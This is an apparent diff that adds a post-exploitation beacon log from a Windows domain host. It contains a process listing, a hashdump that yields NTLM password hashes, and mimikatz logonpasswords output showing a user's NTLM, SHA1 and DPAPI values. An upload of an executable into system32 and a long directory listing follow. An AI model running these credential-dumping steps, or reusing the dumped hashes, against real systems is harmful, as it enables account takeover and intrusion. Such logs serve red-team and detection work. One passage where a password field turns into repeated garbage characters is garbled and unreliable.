+svchost.exe 692 1788 x64 NT AUTHORITY\SYSTEM 0
+svchost.exe 692 1888 x64 NT AUTHORITY\LOCAL SERVICE 0
+svchost.exe 692 1916 x64 NT AUTHORITY\SYSTEM 0
+svchost.exe 692 1936 x64 NT AUTHORITY\LOCAL SERVICE 0
+svchost.exe 692 1084 x64 NT AUTHORITY\LOCAL SERVICE 0
+svchost.exe 692 1448 x64 NT AUTHORITY\SYSTEM 0
+svchost.exe 692 1452 x64 NT AUTHORITY\SYSTEM 0
+svchost.exe 692 2004 x64 NT AUTHORITY\SYSTEM 0
+Memory Compression 4 2208 x64 NT AUTHORITY\SYSTEM 0
+svchost.exe 692 2236 x64 NT AUTHORITY\SYSTEM 0
+VSSVC.exe 692 2248 x64 NT AUTHORITY\SYSTEM 0
+svchost.exe 692 2256 x64 NT AUTHORITY\NETWORK SERVICE 0
+svchost.exe 692 2308 x64 NT AUTHORITY\SYSTEM 0
+svchost.exe 692 2344 x64 NT AUTHORITY\LOCAL SERVICE 0
+svchost.exe 692 2384 x64 NT AUTHORITY\SYSTEM 0
+svchost.exe 692 2432 x64 NT AUTHORITY\LOCAL SERVICE 0
+svchost.exe 692 2480 x64 NT AUTHORITY\LOCAL SERVICE 0
+svchost.exe 692 2644 x64 NT AUTHORITY\LOCAL SERVICE 0
+svchost.exe 692 2652 x64 NT AUTHORITY\LOCAL SERVICE 0
+svchost.exe 692 2756 x64 NT AUTHORITY\SYSTEM 0
+svchost.exe 692 2764 x64 NT AUTHORITY\SYSTEM 0
+svchost.exe 692 2772 x64 NT AUTHORITY\NETWORK SERVICE 0
+svchost.exe 692 2780 x64 NT AUTHORITY\LOCAL SERVICE 0
+svchost.exe 692 2892 x64 NT AUTHORITY\SYSTEM 0
+spoolsv.exe 692 2972 x64 NT AUTHORITY\SYSTEM 0
+svchost.exe 692 2980 x64 NT AUTHORITY\SYSTEM 0
+svchost.exe 692 3092 x64 NT AUTHORITY\NETWORK SERVICE 0
+OfficeClickToRun.exe 692 3104 x64 NT AUTHORITY\SYSTEM 0
+svchost.exe 692 3112 x64 NT AUTHORITY\SYSTEM 0
+svchost.exe 692 3132 x64 NT AUTHORITY\LOCAL SERVICE 0
+svchost.exe 692 3200 x64 NT AUTHORITY\SYSTEM 0
+WaAppAgent.exe 692 3220 x64 NT AUTHORITY\SYSTEM 0
+sysmon64.exe 692 3236 x64 NT AUTHORITY\SYSTEM 0
+WindowsAzureGuestAgent.exe 692 3304 x64 NT AUTHORITY\SYSTEM 0
+svchost.exe 692 3312 x64 NT AUTHORITY\LOCAL SERVICE 0
+MsMpEng.exe 692 3324 x64 NT AUTHORITY\SYSTEM 0
+WindowsAzureNetAgent.exe 692 3340 x64 NT AUTHORITY\SYSTEM 0
+WindowsAzureTelemetryService.exe 692 3364 x64 NT AUTHORITY\SYSTEM 0
+svchost.exe 692 3372 x64 NT AUTHORITY\SYSTEM 0
+svchost.exe 692 3380 x64 NT AUTHORITY\NETWORK SERVICE 0
+svchost.exe 692 3444 x64 NT AUTHORITY\SYSTEM 0
+svchost.exe 692 3540 x64 NT AUTHORITY\LOCAL SERVICE 0
+VFPlugin.exe 3340 3740 x64 NT AUTHORITY\SYSTEM 0
+conhost.exe 3740 3764 x64 NT AUTHORITY\SYSTEM 0
+unsecapp.exe 916 1420 x64 NT AUTHORITY\SYSTEM 0
+WmiPrvSE.exe 916 4140 x64 NT AUTHORITY\NETWORK SERVICE 0
+svchost.exe 692 4348 x64 NT AUTHORITY\NETWORK SERVICE 0
+svchost.exe 692 4688 x64 NT AUTHORITY\SYSTEM 0
+svchost.exe 692 4744 x64 NT AUTHORITY\SYSTEM 0
+taskhostw.exe 1168 4128 x64 NT AUTHORITY\SYSTEM 0
+svchost.exe 692 4444 x64 NT AUTHORITY\LOCAL SERVICE 0
+svchost.exe 692 5660 x64 NT AUTHORITY\LOCAL SERVICE 0
+WaSecAgentProv.exe 3220 5292 x64 NT AUTHORITY\SYSTEM 0
+conhost.exe 5292 5344 x64 NT AUTHORITY\SYSTEM 0
+svchost.exe 692 6080 x64 NT AUTHORITY\LOCAL SERVICE 0
+SgrmBroker.exe 692 4980 x64 NT AUTHORITY\SYSTEM 0
+svchost.exe 692 5308 x64 NT AUTHORITY\SYSTEM 0
+svchost.exe 692 152 x64 NT AUTHORITY\LOCAL SERVICE 0
+SearchIndexer.exe 692 68 x64 NT AUTHORITY\SYSTEM 0
+SecurityHealthService.exe 692 4244 x64 NT AUTHORITY\SYSTEM 0
+csrss.exe 3956 5484 x64 NT AUTHORITY\SYSTEM 2
+winlogon.exe 3956 1688 x64 NT AUTHORITY\SYSTEM 2
+fontdrvhost.exe 1688 2108 x64 Font Driver Host\UMFD-2 2
+dwm.exe 1688 5416 x64 Window Manager\DWM-2 2
+rdpclip.exe 972 5620 x64 STROOP\W.Trommel 2
+sihost.exe 1476 5172 x64 STROOP\W.Trommel 2
+svchost.exe 692 2284 x64 STROOP\W.Trommel 2
+svchost.exe 692 5800 x64 STROOP\W.Trommel 2
+taskhostw.exe 1168 1932 x64 STROOP\W.Trommel 2
+svchost.exe 692 5580 x64 NT AUTHORITY\SYSTEM 0
+powershell.exe 1168 5472 x64 STROOP\W.Trommel 2
+svchost.exe 692 5364 x64 NT AUTHORITY\SYSTEM 0
+svchost.exe 692 4160 x64 NT AUTHORITY\SYSTEM 0
+ctfmon.exe 5364 4844 x64 STROOP\W.Trommel 2
+explorer.exe 4204 5992 x64 STROOP\W.Trommel 2
+svchost.exe 692 1776 x64 STROOP\W.Trommel 2
+svchost.exe 692 3956 x64 NT AUTHORITY\SYSTEM 0
+conhost.exe 5472 6208 x64 STROOP\W.Trommel 2
+ShellExperienceHost.exe 916 6248 x64 STROOP\W.Trommel 2
+SearchUI.exe 916 6440 x64 STROOP\W.Trommel 2
+RuntimeBroker.exe 916 6520 x64 STROOP\W.Trommel 2
+RuntimeBroker.exe 916 6732 x64 STROOP\W.Trommel 2
+powershell.exe 5472 6976 x64 STROOP\W.Trommel 2
+conhost.exe 6976 6992 x64 STROOP\W.Trommel 2
+powershell.exe 5472 7112 x64 STROOP\W.Trommel 2
+conhost.exe 7112 7124 x64 STROOP\W.Trommel 2
+RuntimeBroker.exe 916 1380 x64 STROOP\W.Trommel 2
+iexplore.exe 916 2836 x64 STROOP\W.Trommel 2
+iexplore.exe 2836 6988 x86 STROOP\W.Trommel 2
+smartscreen.exe 916 7236 x64 STROOP\W.Trommel 2
+SecurityHealthSystray.exe 5992 7284 x64 STROOP\W.Trommel 2
+svchost.exe 692 7508 x64 NT AUTHORITY\SYSTEM 0
+LogonUI.exe 1688 2440 x64 NT AUTHORITY\SYSTEM 2
+svchost.exe 692 7396 x64 STROOP\W.Trommel 2
+svchost.exe 692 5280 x64 NT AUTHORITY\LOCAL SERVICE 0
+dllhost.exe 916 8172 x64 STROOP\W.Trommel 2
+SearchProtocolHost.exe 68 6864 x64 STROOP\W.Trommel 2
+FlashUtil_ActiveX.exe 916 6096 x64 STROOP\W.Trommel 2
+SearchProtocolHost.exe 68 4112 x64 NT AUTHORITY\SYSTEM 0
+wsmprovhost.exe 916 4164 x64 STROOP\W.Tax 0
+SearchFilterHost.exe 68 2992 x64 NT AUTHORITY\SYSTEM 0
+
+
+03/30 08:44:33 UTC [input] hashdump
+03/30 08:44:33 UTC [task] Tasked beacon to dump hashes
+03/30 08:44:37 UTC [checkin] host called home, sent: 82501 bytes
+03/30 08:44:38 UTC [output]
+received password hashes:
+bofh:500:aad3b435b51404eeaad3b435b51404ee:e2fb4576f49d1badae64eeb8cd050e19:::
+DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
+Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
+WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:9480a886367fa07551dceadca7c741da:::
+
+
+03/30 08:44:42 UTC [input] logonpasswords
+03/30 08:44:42 UTC [task] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command
+03/30 08:44:43 UTC [checkin] host called home, sent: 417362 bytes
+03/30 08:44:44 UTC [output]
+received output:
+
+Authentication Id : 0 ; 1187171 (00000000:00121d63)
+Session : RemoteInteractive from 2
+User Name : w.trommel
+Domain : STROOP
+Logon Server : S-WIN22
+Logon Time : 3/30/2020 8:36:40 AM
+SID : S-1-5-21-2163199188-2306780613-1636707950-4709
+ msv :
+ [00000003] Primary
+ * Username : W.Trommel
+ * Domain : STROOP
+ * NTLM : e4a22d8e7bbec871b341c88c2e94cba2
+ * SHA1 : e4d319d431fc5f20f9b459d40870854c840834d7
+ * DPAPI : e4c81fcb4b66f54c7d549fb446425a9c
+ tspkg :
+ wdigest :
+ * Username : W.Trommel
+ * Domain : STROOP
+ * Password : (null)
+ kerberos :
+ * Username : W.Trommel
+ * Domain : STROOP.LOCAL
+ * Password : (null)
+ ssp :
+ credman :
+
+Authentication Id : 0 ; 1187067 (00000000:00121cfb)
+Session : RemoteInteractive from 2
+User Name : w.trommel
+Domain : STROOP
+Logon Server : S-WIN22
+Logon Time : 3/30/2020 8:36:40 AM
+SID : S-1-5-21-2163199188-2306780613-1636707950-4709
+ msv :
+ [00000003] Primary
+ * Username : W.Trommel
+ * Domain : STROOP
+ * NTLM : e4a22d8e7bbec871b341c88c2e94cba2
+ * SHA1 : e4d319d431fc5f20f9b459d40870854c840834d7
+ * DPAPI : e4c81fcb4b66f54c7d549fb446425a9c
+ tspkg :
+ wdigest :
+ * Username : W.Trommel
+ * Domain : STROOP
+ * Password : (null)
+ kerberos :
+ * Username : w.trommel
+ * Domain : STROOP.LOCAL
+ * Password : (null)
+ ssp :
+ credman :
+
+Authentication Id : 0 ; 1155726 (00000000:0011a28e)
+Session : Interactive from 2
+User Name : DWM-2
+Domain : Window Manager
+Logon Server : (null)
+Logon Time : 3/30/2020 8:36:40 AM
+SID : S-1-5-90-0-2
+ msv :
+ [00000003] Primary
+ * Username : L-WIN224$
+ * Domain : STROOP
+ * NTLM : b7fdacb33b890f235bf7e107ecf00d41
+ * SHA1 : 81d84bb5789059ccca5504e4fb218b243ce2e820
+ tspkg :
+ wdigest :
+ * Username : L-WIN224$
+ * Domain : STROOP
+ * Password : (null)
+ kerberos :
+ * Username : L-WIN224$
+ * Domain : stroop.local
+ * Password :
kfB2!9ssJ".!\C0SQjy%ER>("1:$E8]v<9c5a]Er2^.!1C7v9ssJ".!\C0SQjy%ER>("1:$E8]v<9c5a]Er2^.!1C7v9ssJ".!\C0SQjy%ER>("1:$E8]v<9c5a]Er2^.!1C7v9ssJ".!\C0SQjy%ER>("1:$E8]v<9c5a]Er2^.!1C7v9ssJ".!\C0SQjy%ER>("1:$E8]v<9c5a]Er2^.!1C7v9ssJ".!\C0SQjy%ER>("1:$E8]v<9c5a]Er2^.!1C7v9ssJ".!\C0SQjy%ER>("1:$E8]v<9c5a]Er2^.!1C7v pwd
+03/30 08:51:19 UTC [task] <> Tasked beacon to print working directory
+03/30 08:51:21 UTC [checkin] host called home, sent: 8 bytes
+03/30 08:51:22 UTC [output]
+Current directory is C:\windows\system32
+
+03/30 08:52:03 UTC [input] upload
+03/30 08:52:11 UTC [task] <> Tasked beacon to upload C:\Users\outflank\Desktop\netsrv.exe as netsrv.exe
+03/30 08:52:11 UTC [indicator] file: a1a6090d13b60164ca3481dabf8cba86 289280 bytes netsrv.exe
+03/30 08:52:15 UTC [checkin] host called home, sent: 289302 bytes
+03/30 08:52:21 UTC [input] ls netsrv.exe
+03/30 08:52:21 UTC [task] <> Tasked beacon to list files in netsrv.exe
+03/30 08:52:25 UTC [checkin] host called home, sent: 28 bytes
+03/30 08:52:25 UTC [error] could not open netsrv.exe\*: 267
+03/30 08:52:27 UTC [input] ls
+03/30 08:52:27 UTC [task] <> Tasked beacon to list files in .
+03/30 08:52:30 UTC [checkin] host called home, sent: 19 bytes
+03/30 08:52:30 UTC [output]
+C:\windows\system32\*
+D 0 03/30/2020 08:52:15 .
+D 0 03/30/2020 08:52:15 ..
+D 0 09/15/2018 09:07:52 0409 +F 232 09/15/2018 07:28:43 @AppHelpToast.png +F 308 09/15/2018 07:28:42 @AudioToastIcon.png +F 450 09/15/2018 07:28:30 @BackgroundAccessToastIcon.png +F 199 09/15/2018 07:28:50 @bitlockertoastimage.png +F 14791 09/15/2018 07:28:50 @edptoastimage.png +F 330 09/15/2018 07:28:51 @EnrollmentToastIcon.png +F 563 09/15/2018 07:28:53 @language_notification_icon.png +F 483 09/15/2018 07:29:21 @optionalfeatures.png +F 404 09/15/2018 07:28:56 @VpnToastIcon.png +F 15106 09/15/2018 07:28:26 @WiFiNotificationIcon.png +F 195443 09/15/2018 07:29:13 @windows-hello-V4.1.gif +F 714 09/15/2018 07:29:13 @WindowsHelloFaceToastIcon.png +F 518 09/15/2018 07:28:39 @WindowsUpdateToastIcon.contrast-black.png +F 810 09/15/2018 07:28:39 @WindowsUpdateToastIcon.contrast-white.png +F 518 09/15/2018 07:28:39 @WindowsUpdateToastIcon.png +F 691 09/15/2018 07:29:14 @WirelessDisplayToast.png +F 155 09/15/2018 07:28:36 @WwanNotificationIcon.png +F 352 09/15/2018 07:28:36 @WwanSimLockIcon.png +F 196608 09/15/2018 07:28:30 aadauthhelper.dll +F 692736 03/07/2020 00:53:37 aadcloudap.dll +F 68096 09/15/2018 07:28:38 aadjcsp.dll +F 1824768 03/07/2020 00:53:37 aadtb.dll +F 145720 09/15/2018 07:28:30 aadWamExtension.dll +F 413200 09/15/2018 07:28:56 AboutSettingsHandlers.dll +F 400384 03/07/2020 00:53:43 AboveLockAppHost.dll +F 3838976 09/15/2018 07:28:42 accessibilitycpl.dll +F 273408 09/14/2018 17:59:00 accountaccessor.dll +F 441856 09/14/2018 17:58:00 AccountsRt.dll +F 350208 03/07/2020 00:54:17 AcGenral.dll +F 314368 03/07/2020 00:54:16 AcLayers.dll +F 11264 09/15/2018 07:29:14 acledit.dll +F 5504000 09/15/2018 07:29:14 aclui.dll +F 324624 03/07/2020 00:53:51 acmigration.dll +F 200192 03/07/2020 00:53:38 ACPBackgroundManagerPolicy.dll +F 82432 09/15/2018 07:28:42 acppage.dll +F 12800 09/15/2018 07:29:14 acproxy.dll +F 65024 09/15/2018 07:29:22 AcSpecfc.dll +F 313856 09/15/2018 07:28:51 ActionCenter.dll +F 560640 09/15/2018 07:28:52 ActionCenterCPL.dll +F 72704 09/15/2018 
07:28:57 ActionMgr.dll +F 188928 09/15/2018 07:28:59 ActionQueue.dll +F 55808 09/15/2018 07:28:30 ActivationClient.dll +F 690176 03/07/2020 00:53:38 ActivationManager.dll +F 265728 09/15/2018 07:28:43 activeds.dll +F 112128 09/15/2018 07:28:43 activeds.tlb +F 101376 03/07/2020 00:54:28 ActiveSyncCsp.dll +F 1819136 09/14/2018 17:49:00 ActiveSyncProvider.dll +F 612864 09/15/2018 07:28:50 actxprxy.dll +F 32768 09/15/2018 07:29:24 AcWinRT.dll +F 15360 09/15/2018 07:29:22 AcXtrnal.dll +F 1300480 09/15/2018 07:28:30 AdaptiveCards.dll +F 67584 09/15/2018 07:28:36 AddressParser.dll +F 24064 09/15/2018 07:28:56 adhapi.dll +F 97792 09/15/2018 07:28:56 adhsvc.dll +F 534528 09/15/2018 09:10:02 AdmTmpl.dll +F 58368 09/15/2018 07:29:14 adprovider.dll +F 136192 09/15/2018 09:10:00 adrclient.dll +F 249344 09/15/2018 07:29:14 adsldp.dll +F 252928 09/15/2018 07:28:43 adsldpc.dll +F 101376 09/15/2018 07:29:14 adsmsext.dll +F 351232 09/15/2018 07:29:16 adsnt.dll +F 844288 09/15/2018 07:28:46 adtschema.dll +F 145408 03/07/2020 00:53:31 AdvancedEmojiDS.dll +D 0 09/15/2018 07:34:00 AdvancedInstallers +F 659720 09/15/2018 07:28:26 advapi32.dll +F 2560 09/15/2018 07:28:25 advapi32res.dll +F 144384 09/15/2018 07:28:51 advpack.dll +F 30720 09/15/2018 07:28:42 aeevts.dll +F 747536 03/07/2020 00:53:51 aeinv.dll +F 513544 03/07/2020 00:53:26 aepic.dll +F 1188352 03/07/2020 00:53:30 AgentService.exe +F 2871824 03/07/2020 00:53:51 aitstatic.exe +F 25088 09/15/2018 07:28:30 AJRouter.dll +F 94720 09/15/2018 07:28:38 alg.exe +F 162816 09/15/2018 07:29:14 altspace.dll +D 0 09/15/2018 07:34:00 am-et +F 18944 09/15/2018 09:08:37 amcompat.tlb +F 65536 09/15/2018 07:28:26 amsi.dll +F 14848 09/15/2018 07:28:26 amsiproxy.dll +F 97792 09/15/2018 07:29:21 amstream.dll +F 41984 09/15/2018 07:29:24 AnalogCommonProxyStub.dll +F 251904 09/15/2018 07:29:17 apds.dll +F 71680 09/14/2018 18:03:00 APHostClient.dll +F 16384 09/14/2018 18:03:00 APHostRes.dll +F 329728 09/14/2018 17:57:00 APHostService.dll +F 87040 
03/07/2020 00:53:38 ApiSetHost.AppExecutionAlias.dll +F 116536 09/15/2018 07:28:25 apisetschema.dll +F 1267712 03/07/2020 00:53:44 APMon.dll +F 928768 03/07/2020 00:53:37 AppContracts.dll +F 178176 09/15/2018 07:28:29 AppExtension.dll +F 553984 03/07/2020 00:53:50 apphelp.dll +F 33792 09/15/2018 07:28:43 Apphlpdm.dll +F 114176 09/15/2018 07:28:30 AppHostRegistrationVerifier.exe +F 64784 09/15/2018 07:28:42 appidapi.dll +F 19456 09/15/2018 07:28:42 appidcertstorecheck.exe +F 158720 09/15/2018 07:28:42 appidpolicyconverter.exe +F 404480 09/15/2018 09:10:02 AppIdPolicyEngineApi.dll +F 78336 09/15/2018 07:28:42 appidsvc.dll +F 25600 09/15/2018 07:28:42 appidtel.exe +F 176640 03/07/2020 00:53:37 appinfo.dll +F 12288 09/15/2018 07:28:52 appinfoext.dll +F 669184 03/07/2020 00:53:48 ApplicationFrame.dll +F 72984 03/07/2020 00:53:48 ApplicationFrameHost.exe +D 0 09/15/2018 07:33:50 AppLocker +F 382976 03/07/2020 00:53:51 AppLockerCSP.dll +F 1128960 03/07/2020 00:53:30 ApplySettingsTemplateCatalog.exe +F 1054712 03/07/2020 00:53:36 ApplyTrustOffline.exe +F 150016 09/15/2018 09:09:56 AppManagementConfiguration.dll +F 198656 09/15/2018 09:09:59 appmgmts.dll +F 448512 09/15/2018 09:10:00 appmgr.dll +F 112128 09/15/2018 07:29:25 AppMon.dll +F 143360 09/15/2018 07:28:36 AppointmentActivation.dll +F 779264 09/15/2018 07:28:34 AppointmentApis.dll +D 0 03/07/2020 00:55:54 appraiser +F 1726480 03/07/2020 00:53:51 appraiser.dll +F 679424 03/07/2020 00:53:30 AppReadiness.dll +F 12800 09/15/2018 07:28:42 apprepapi.dll +F 590336 03/07/2020 00:53:49 AppResolver.dll +F 238592 09/15/2018 07:28:24 ApproveChildRequest.exe +F 178176 03/07/2020 00:53:37 appsruprov.dll +D 0 09/15/2018 09:10:11 AppV +F 667152 03/07/2020 00:53:30 AppVCatalog.dll +F 831800 03/07/2020 00:53:29 AppVClient.exe +F 224256 09/15/2018 09:10:00 AppvClientEventLog.dll +F 41488 09/15/2018 09:09:58 AppVClientPS.dll +F 182288 09/15/2018 09:10:04 AppVDllSurrogate.exe +F 817168 03/07/2020 00:53:30 AppVEntStreamingManager.dll +F 
1399824 03/07/2020 00:53:30 AppVEntSubsystemController.dll +F 2200376 03/07/2020 00:53:29 AppVEntSubsystems64.dll +F 1715000 03/07/2020 00:53:30 AppVEntVirtualization.dll +F 133632 09/15/2018 09:10:04 appvetwclientres.dll +F 224256 09/15/2018 09:10:00 appvetwsharedperformance.dll +F 13824 09/15/2018 09:10:04 appvetwstreamingux.dll +F 258064 09/15/2018 09:10:04 AppVFileSystemMetadata.dll +F 1612816 03/07/2020 00:53:30 AppVIntegration.dll +F 959504 09/15/2018 09:10:04 AppVManifest.dll +F 173064 09/15/2018 09:10:04 AppVNice.exe +F 828216 03/07/2020 00:53:30 AppVOrchestration.dll +F 1045008 09/15/2018 09:10:04 AppVPolicy.dll +F 649528 03/07/2020 00:53:30 AppVPublishing.dll +F 743224 03/07/2020 00:53:30 AppVReporting.dll +F 396088 03/07/2020 00:53:29 AppVScripting.dll +F 15160 09/15/2018 09:09:59 AppVSentinel.dll +F 231440 09/15/2018 09:10:04 AppVShNotify.exe +F 202768 09/15/2018 09:10:04 AppVStreamingUX.dll +F 228664 09/15/2018 09:10:04 AppVStreamMap.dll +F 20488 09/15/2018 09:09:58 AppVTerminator.dll +F 918528 09/15/2018 07:29:14 appwiz.cpl +F 349696 03/07/2020 00:53:36 AppxAllUserStore.dll +F 207360 09/15/2018 07:28:26 AppXApplicabilityBlob.dll +F 225280 09/15/2018 07:28:26 AppxApplicabilityEngine.dll +F 863528 03/07/2020 00:53:25 AppXDeploymentClient.dll +F 1608192 03/07/2020 00:53:35 AppXDeploymentExtensions.desktop.dll +F 2197504 03/07/2020 00:53:35 AppXDeploymentExtensions.onecore.dll +F 3392000 03/07/2020 00:53:35 AppXDeploymentServer.dll +F 1662264 03/07/2020 00:53:25 AppxPackaging.dll +F 3022 09/15/2018 07:28:29 AppxProvisioning.xml +F 270848 09/15/2018 07:28:36 AppxSip.dll +F 19968 09/15/2018 07:28:34 AppxStreamingDataSourcePS.dll +F 126976 03/07/2020 00:53:36 AppxSysprep.dll +D 0 09/15/2018 09:09:27 ar-SA +F 622080 09/15/2018 07:29:14 archiveint.dll +F 26112 09/15/2018 07:29:14 ARP.EXE +F 2560 09/15/2018 07:29:36 asferror.dll +F 30880 09/15/2018 07:29:50 aspnet_counters.dll +F 486400 03/07/2020 00:54:22 AssignedAccessCsp.dll +F 629248 03/07/2020 00:54:22 
AssignedAccessManager.dll +F 936960 03/07/2020 00:54:22 assignedaccessmanagersvc.dll +F 10240 09/15/2018 09:09:57 assignedaccessproviderevents.dll +F 60416 03/07/2020 00:53:38 AssignedAccessRuntime.dll +F 78336 09/15/2018 09:09:59 AssignedAccessShellProxy.dll +F 89088 09/15/2018 07:28:55 asycfilt.dll +F 30720 09/15/2018 07:28:45 at.exe +F 78848 09/15/2018 07:28:42 AtBroker.exe +F 96768 09/15/2018 07:28:44 atl.dll +F 40960 09/15/2018 07:28:30 atlthunk.dll +F 47616 03/07/2020 00:53:55 atmlib.dll +F 21504 09/15/2018 07:29:16 attrib.exe +F 604552 03/07/2020 00:53:31 audiodg.exe +F 750080 03/07/2020 00:53:31 AudioEndpointBuilder.dll +F 2086192 03/07/2020 00:53:31 AudioEng.dll +F 359424 09/15/2018 07:28:56 AudioHandlers.dll +F 419112 09/15/2018 07:28:20 AUDIOKSE.dll +F 57344 09/15/2018 07:28:20 audioresourceregistrar.dll +F 1331536 03/07/2020 00:53:31 AudioSes.dll +F 1929728 03/07/2020 00:53:31 audiosrv.dll +F 347784 03/07/2020 00:53:31 AudioSrvPolicyManager.dll +F 199168 09/15/2018 07:28:57 auditcse.dll +F 223232 09/15/2018 09:10:05 AuditNativeSnapIn.dll +F 35328 09/15/2018 07:29:14 auditpol.exe +F 71680 09/15/2018 07:29:14 auditpolcore.dll +F 74240 09/15/2018 09:10:05 AuditPolicyGPInterop.dll +F 95744 09/15/2018 09:10:05 auditpolmsg.dll +F 206848 03/07/2020 00:53:37 AuthBroker.dll +F 110592 09/15/2018 07:28:45 AuthBrokerUI.dll +F 52224 09/15/2018 07:29:13 authentication.dll +F 67072 09/15/2018 07:28:57 AuthExt.dll +F 526848 09/15/2018 07:29:19 authfwcfg.dll +F 305152 09/15/2018 07:28:51 AuthFWGP.dll +F 5107200 09/15/2018 07:28:51 AuthFWSnapin.dll +F 112640 09/15/2018 07:28:51 AuthFWWizFwk.dll +F 138624 09/15/2018 07:28:38 AuthHost.exe +F 18944 09/15/2018 07:28:38 AuthHostProxy.dll +F 504832 09/15/2018 07:28:44 authui.dll +F 286720 09/15/2018 07:28:46 authz.dll +F 956416 09/15/2018 07:28:42 autochk.exe +F 934400 09/15/2018 07:29:14 autoconv.exe +F 908800 09/15/2018 07:29:14 autofmt.exe +F 187392 09/15/2018 07:28:25 autopilot.dll +F 165888 09/15/2018 07:29:14 
autoplay.dll +F 138092 09/15/2018 07:28:22 AverageRoom.bin +F 79872 09/15/2018 07:29:22 avicap32.dll +F 115712 09/15/2018 07:29:22 avifil32.dll +F 30664 09/15/2018 07:28:20 avrt.dll +F 112128 03/07/2020 00:53:43 AxInstSv.dll +F 60416 09/15/2018 07:28:53 AxInstUI.exe +F 41587 09/15/2018 07:29:21 azman.msc +F 892928 09/15/2018 07:29:14 azroles.dll +F 427520 09/15/2018 07:29:21 azroleui.dll +F 31232 09/15/2018 07:29:14 AzSqlExt.dll +F 1918464 03/07/2020 00:53:46 AzureSettingSyncProvider.dll +F 112640 09/15/2018 09:10:03 baaupdate.exe +F 67072 09/15/2018 07:28:38 BackgroundMediaPolicy.dll +F 19768 09/15/2018 07:28:36 backgroundTaskHost.exe +F 37376 09/15/2018 07:28:26 BackgroundTransferHost.exe +F 15872 09/15/2018 07:28:29 BamSettingsClient.dll +F 89088 03/07/2020 00:53:33 BarcodeProvisioningPlugin.dll +F 210432 09/15/2018 07:28:59 basecsp.dll +F 65024 09/15/2018 07:28:45 basesrv.dll +F 1669632 09/15/2018 07:28:24 batmeter.dll +F 260608 09/15/2018 07:28:29 bcastdvr.proxy.dll +F 107520 09/15/2018 07:28:29 BcastDVRBroker.dll +F 480768 09/15/2018 07:28:29 BcastDVRClient.dll +F 234496 09/15/2018 07:28:29 BcastDVRCommon.dll +F 1388032 03/07/2020 00:54:08 bcastdvruserservice.dll +F 122592 09/15/2018 07:28:46 bcd.dll +F 241664 09/15/2018 07:28:22 bcdboot.exe +F 482104 03/07/2020 00:53:26 bcdedit.exe +F 76800 09/15/2018 07:28:22 bcdprov.dll +F 87040 09/15/2018 07:28:22 bcdsrv.dll +F 367208 03/07/2020 00:53:25 BCP47Langs.dll +F 159816 09/15/2018 07:28:34 BCP47mrm.dll +F 143632 09/15/2018 07:28:45 bcrypt.dll +F 515440 03/07/2020 00:53:54 bcryptprimitives.dll +F 97280 09/15/2018 07:29:24 bdaplgin.ax +F 372224 03/07/2020 00:54:25 bdechangepin.exe +F 133120 09/15/2018 09:09:57 BdeHdCfg.exe +F 103424 09/15/2018 09:09:57 BdeHdCfgLib.dll +F 50176 09/15/2018 09:10:00 bderepair.dll +F 454144 03/07/2020 00:54:25 bdesvc.dll +F 11776 09/15/2018 09:10:01 BdeSysprep.dll +F 34304 09/15/2018 09:10:04 bdeui.dll +F 53760 09/15/2018 09:09:55 BdeUISrv.exe +F 290984 09/15/2018 09:10:05 
bdeunlock.exe +F 882688 03/07/2020 00:53:40 BFE.DLL +D 0 09/15/2018 09:09:27 bg-BG +F 29696 09/15/2018 07:28:34 bi.dll +F 65536 09/15/2018 07:28:25 bidispl.dll +F 389120 03/07/2020 00:53:28 BingASDS.dll +F 97792 03/07/2020 00:53:28 BingFilterDS.dll +F 9670656 03/07/2020 00:53:41 BingMaps.dll +F 902144 03/07/2020 00:53:42 BingOnlineServices.dll +F 348160 03/07/2020 00:53:42 BioCredProv.dll +F 805504 03/07/2020 00:54:08 BioIso.exe +F 835584 03/07/2020 00:53:42 bisrv.dll +F 224768 03/07/2020 00:53:58 BitLockerCsp.dll +F 141312 09/15/2018 09:09:58 BitLockerDeviceEncryption.exe +F 102400 09/15/2018 09:10:01 BitLockerWizard.exe +F 102400 09/15/2018 09:10:01 BitLockerWizardElev.exe +F 211456 09/15/2018 07:28:42 bitsadmin.exe +F 81920 09/15/2018 07:28:44 bitsigd.dll +F 30208 09/15/2018 07:28:30 bitsperf.dll +F 64512 09/15/2018 07:28:30 BitsProxy.dll +F 320728 03/07/2020 00:53:42 biwinrt.dll +F 77824 09/15/2018 07:29:46 BlbEvents.dll +F 2560 09/15/2018 07:29:54 blbres.dll +F 66560 09/15/2018 07:29:54 blb_ps.dll +F 198144 09/15/2018 07:28:36 BluetoothApis.dll +F 65536 09/15/2018 07:28:56 BluetoothDesktopHandlers.dll +F 8495 09/15/2018 07:28:22 BluetoothPairingSystemToastIcon.contrast-black.png +F 8736 09/15/2018 07:28:22 BluetoothPairingSystemToastIcon.contrast-high.png +F 8495 09/15/2018 07:28:22 BluetoothPairingSystemToastIcon.contrast-white.png +F 8541 09/15/2018 07:28:22 BluetoothPairingSystemToastIcon.png +F 1320 09/15/2018 07:28:22 BluetoothSystemToastIcon.contrast-white.png +F 1229 09/15/2018 07:28:22 BluetoothSystemToastIcon.png +F 19456 09/15/2018 07:28:22 bnmanager.dll +D 0 03/07/2020 00:55:54 Boot +F 3170304 09/15/2018 07:28:29 boot.sdi +F 93184 09/15/2018 07:28:22 bootcfg.exe +F 26112 09/15/2018 07:29:46 bootim.exe +F 657408 03/07/2020 00:53:36 BootMenuUX.dll +F 108048 09/15/2018 07:28:22 bootsect.exe +F 3072 09/15/2018 07:28:42 bootstr.dll +F 3978240 03/07/2020 00:53:51 bootux.dll +F 26112 09/15/2018 07:28:46 BOOTVID.DLL +F 22984 09/15/2018 07:29:22 bopomofo.uce 
